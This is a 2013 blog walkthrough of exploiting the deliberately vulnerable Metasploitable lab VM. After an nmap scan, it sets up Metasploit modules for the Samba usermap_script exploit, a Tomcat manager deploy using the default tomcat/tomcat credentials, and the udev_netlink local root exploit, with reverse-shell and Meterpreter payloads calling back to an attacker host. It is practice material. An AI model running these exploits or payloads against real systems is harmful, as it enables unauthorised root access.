Saturday, November 9, 2013

Metasploitable - Walkthrough

Metasploitable is another vulnerable VM designed to practice penetration testing, and especially Metasploit. I could use manual methods like in the previous cases, but I decided to use Metasploit for the exploitation.

I started with NMAP as usual:

root@kali:~# nmap -sS -A 192.168.1.22

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-09 21:28 CET
Nmap scan report for 192.168.1.22
Host is up (0.0022s latency).
Not shown: 988 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         ProFTPD 1.3.1
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45+00:00
|_Not valid after:  2010-04-16T13:07:45+00:00
|_ssl-date: 2013-11-09T20:28:17+00:00; -2s from local time.
53/tcp   open  domain      ISC BIND 9.4.2
| dns-nsid:
|_  bind.version: 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Site doesn't have a title (text/html).
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info: Protocol: 10
| Version: 5.0.51a-3ubuntu5
| Thread ID: 8
| Some Capabilities: Connect with DB, Compress, SSL, Transactions, Secure Connection
| Status: Autocommit
|_Salt: V&Vbg^%8+nhCQQ"PQ%bB
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Apache Tomcat/5.5
MAC Address: 00:0C:29:0E:5C:5B (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Host:  metasploitable.localdomain; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name:
|   Workgroup: WORKGROUP
|_  System time: 2013-11-09T15:28:17-05:00

TRACEROUTE
HOP RTT     ADDRESS
1   2.16 ms 192.168.1.22

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.00 seconds

As everything is too easy with Metasploit I will show two methods.


Method 1 - Samba

If we do a Google search for Samba 3.0.20 exploit, we run into the following webpage:

http://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script

which is exactly the MSF module we need. Configuring and running MSF:

msf exploit(usermap_script) > set RHOST 192.168.1.22
msf exploit(usermap_script) > set payload cmd/unix/reverse_netcat
msf exploit(usermap_script) > set LHOST 192.168.1.17
msf exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.22     yes       The target address
   RPORT  139              yes       The target port


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.17     yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(usermap_script) > exploit

[*] Started reverse handler on 192.168.1.17:4444
[*] Command shell session 1 opened (192.168.1.17:4444 -> 192.168.1.22:59321) at 2013-11-09 21:46:52 +0100

python -c 'import pty;pty.spawn("/bin/bash")'
root@metasploitable:/# id
id
uid=0(root) gid=0(root)
root@metasploitable:/# 

As Samba was running with root privileges we are done...


Method 2 - via Tomcat Manager + UDEV Netlink local exploit

There is a Tomcat service at port 8180, and if we navigate to it we can find the default links, to the manager, admin page and so on. If we do a quick Google search we can find that the default Tomcat manager username and password are tomcat/tomcat. I tried and it really worked. Now we only need the exploit:

http://www.rapid7.com/db/modules/exploit/multi/http/tomcat_mgr_deploy

Here is the related MSF configration:

msf exploit(tomcat_mgr_deploy) > show options

Module options (exploit/multi/http/tomcat_mgr_deploy):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  tomcat           no        The password for the specified username
   PATH      /manager         yes       The URI path of the manager app (/deploy and /undeploy will be used)
   Proxies                    no        Use a proxy chain
   RHOST     192.168.1.22     yes       The target address
   RPORT     8180             yes       The target port
   USERNAME  tomcat           no        The username to authenticate as
   VHOST                      no        HTTP server virtual host


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.17     yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(tomcat_mgr_deploy) > exploit

[*] Started reverse handler on 192.168.1.17:4444
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 6462 bytes as Yd0glyiN6vrkhM.war ...
[*] Executing /Yd0glyiN6vrkhM/Ak0iJcrqppzQUwP7xB.jsp...
[*] Undeploying Yd0glyiN6vrkhM ...
[*] Sending stage (30355 bytes) to 192.168.1.22
[*] Meterpreter session 2 opened (192.168.1.17:4444 -> 192.168.1.22:42541) at 2013-11-09 22:06:25 +0100

meterpreter > sysinfo
Computer    : metasploitable
OS          : Linux 2.6.24-16-server (i386)
Meterpreter : java/java
meterpreter > getuid
Server username: tomcat55


As we can see we are not root yet, but a limited tomcat55 account. Let's put meterpreter to the background ('background' command) and look for a local root exploit.

I picked up the following:
http://www.rapid7.com/db/modules/exploit/linux/local/udev_netlink

meterpreter > background
[*] Backgrounding session 3...
msf exploit(tomcat_mgr_deploy) > use exploit/linux/local/
use exploit/linux/local/hp_smhstart     use exploit/linux/local/sock_sendpage   use exploit/linux/local/zpanel_zsudo
use exploit/linux/local/kloxo_lxsuexec  use exploit/linux/local/udev_netlink   
msf exploit(tomcat_mgr_deploy) > use exploit/linux/local/udev_netlink

msf exploit(udev_netlink) > set SESSION 3
SESSION => 3
msf exploit(udev_netlink) > show options

Module options (exploit/linux/local/udev_netlink):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   NetlinkPID                    no        Usually udevd pid-1.  Meterpreter sessions will autodetect
   SESSION                       yes       The session to run this module on.
   WritableDir  /tmp             yes       A directory where we can write files (must not be mounted noexec)


Exploit target:

   Id  Name
   --  ----
   0   Linux x86


msf exploit(udev_netlink) > exploit

[*] Started reverse handler on 192.168.1.17:4444
[*] Attempting to autodetect netlink pid...
[*] Meterpreter session, using get_processes to find netlink pid
[*] udev pid: 2991
[+] Found netlink pid: 2990
[*] Writing payload executable (259 bytes) to /tmp/IQBLahEWgL
[*] Writing exploit executable (1879 bytes) to /tmp/pGynSspMQB
[*] chmod'ing and running it...
[*] Command shell session 4 opened (192.168.1.17:4444 -> 192.168.1.22:48408) at 2013-11-09 22:14:30 +0100

id
uid=0(root) gid=0(root)


...and we are root.

There are more methods, but I will leave them to you.

No comments: